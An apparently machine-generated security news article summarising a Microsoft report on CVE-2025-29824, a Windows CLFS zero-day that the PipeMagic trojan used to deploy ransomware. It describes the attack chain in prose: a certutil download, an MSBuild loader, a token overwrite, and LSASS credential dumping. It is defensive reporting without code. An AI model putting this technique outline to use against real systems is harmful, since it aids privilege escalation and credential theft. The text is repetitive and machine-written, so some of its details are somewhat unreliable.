Ethical Hacking News
A recently discovered security flaw in Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets. The vulnerability, identified as CVE-2025-29824, is a privilege escalation bug that could be exploited to achieve SYSTEM privileges. Microsoft is tracking the activity and post-compromise exploitation of CVE-2025-29824 under the moniker Storm-2460.
This attack demonstrates how attackers can leverage privilege escalation bugs to achieve widespread deployment and detonation of ransomware within an environment. Ransomware threat actors value post-compromise elevation of privilege exploits, making it crucial for organizations to remain proactive in protecting themselves against emerging threats like PipeMagic Trojan and its associated ransomware payloads.
The Microsoft report revealed a newly discovered security flaw (CVE-2025-29824) in the Windows Common Log File System (CLFS) that was exploited as a zero-day in ransomware attacks.The vulnerability is a privilege escalation bug in CLFS that could be exploited to achieve SYSTEM privileges.The targets of these malicious attacks include organizations in the IT, real estate, financial, software, and retail sectors in several countries.The threat actors used a malware named PipeMagic to deliver the exploit and ransomware payloads, likely via the certutil utility from a compromised third-party site.The malware is a malicious MSBuild file that contains an encrypted payload, which is then unpacked to launch PipeMagic, a plugin-based trojan.The vulnerability targets a memory corruption bug in the CLFS kernel driver and allows for process injection into SYSTEM processes.The attack resulted in successful exploitation of user credentials and encryption of files with a random extension, leading to ransomware deployment.
PipeMagic Trojan Exploits Windows Zero-Day Vulnerability to Deploy Ransomware
A recent report by Microsoft has revealed that a newly discovered security flaw in the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets. The vulnerability, identified as CVE-2025-29824, is a privilege escalation bug in CLFS that could be exploited to achieve SYSTEM privileges.
The targets of these malicious attacks include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia. Microsoft has stated that it is tracking the activity and post-compromise exploitation of CVE-2025-29824 under the moniker Storm-2460.
The threat actors involved in these attacks are using a malware named PipeMagic to deliver the exploit as well as ransomware payloads. The exact initial access vector used in the attacks is currently not known, but it has been observed that the threat actors have been using the certutil utility to download malware from a legitimate third-party site that was previously compromised to stage the payloads.
The malware is a malicious MSBuild file that contains an encrypted payload, which is then unpacked to launch PipeMagic, a plugin-based trojan that has been detected in the wild since 2022. This is not the first time that PipeMagic has been linked to ransomware attacks; previously, it was also observed in connection with Nokoyawa ransomware attacks that exploited another CLFS zero-day flaw (CVE-2023-28252).
In some of the other attacks attributed to the same actor, the victim's machines were infected with a custom modular backdoor named 'PipeMagic' that gets launched via an MSBuild script. Windows 11, version 24H2, is not affected by this specific exploitation, as access to certain System Information Classes within NtQuerySystemInformation is restricted to users with SeDebugPrivilege, which typically only admin-like users can obtain.
The exploit targets a vulnerability in the CLFS kernel driver. The exploit then utilizes a memory corruption and the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF, enabling all privileges for the process, which allows for process injection into SYSTEM processes.
Successful exploitation is followed by the threat actor extracting user credentials by dumping the memory of LSASS and encrypting files on the system with a random extension. Microsoft stated that it was unable to obtain a ransomware sample for analysis but said that the ransom note dropped after encryption included a TOR domain tied to the RansomEXX ransomware family.
The vulnerability in question, CVE-2025-29824, highlights the growing concern of zero-day vulnerabilities being exploited by threat actors to deploy ransomware. This attack demonstrates how attackers can leverage privilege escalation bugs to achieve widespread deployment and detonation of ransomware within an environment.
Ransomware threat actors value post-compromise elevation of privilege exploits because these could enable them to escalate initial access, including handoffs from commodity malware distributors, into privileged access. They then use privileged access for widespread deployment and detonation of ransomware within an environment.
In conclusion, the discovery of this new vulnerability highlights the importance of timely patching and vigilance in cybersecurity. As threat actors continue to evolve their tactics, it is crucial for organizations to remain proactive in protecting themselves against emerging threats like PipeMagic Trojan and its associated ransomware payloads.
Related Information:
https://www.ethicalhackingnews.com/articles/PipeMagic-Trojan-Exploits-Windows-Zero-Day-Vulnerability-to-Deploy-Ransomware-A-Growing-Concern-for-Cybersecurity-ehn.shtml
Published: Wed Apr 9 05:03:33 2025 by llama3.2 3B Q4_K_M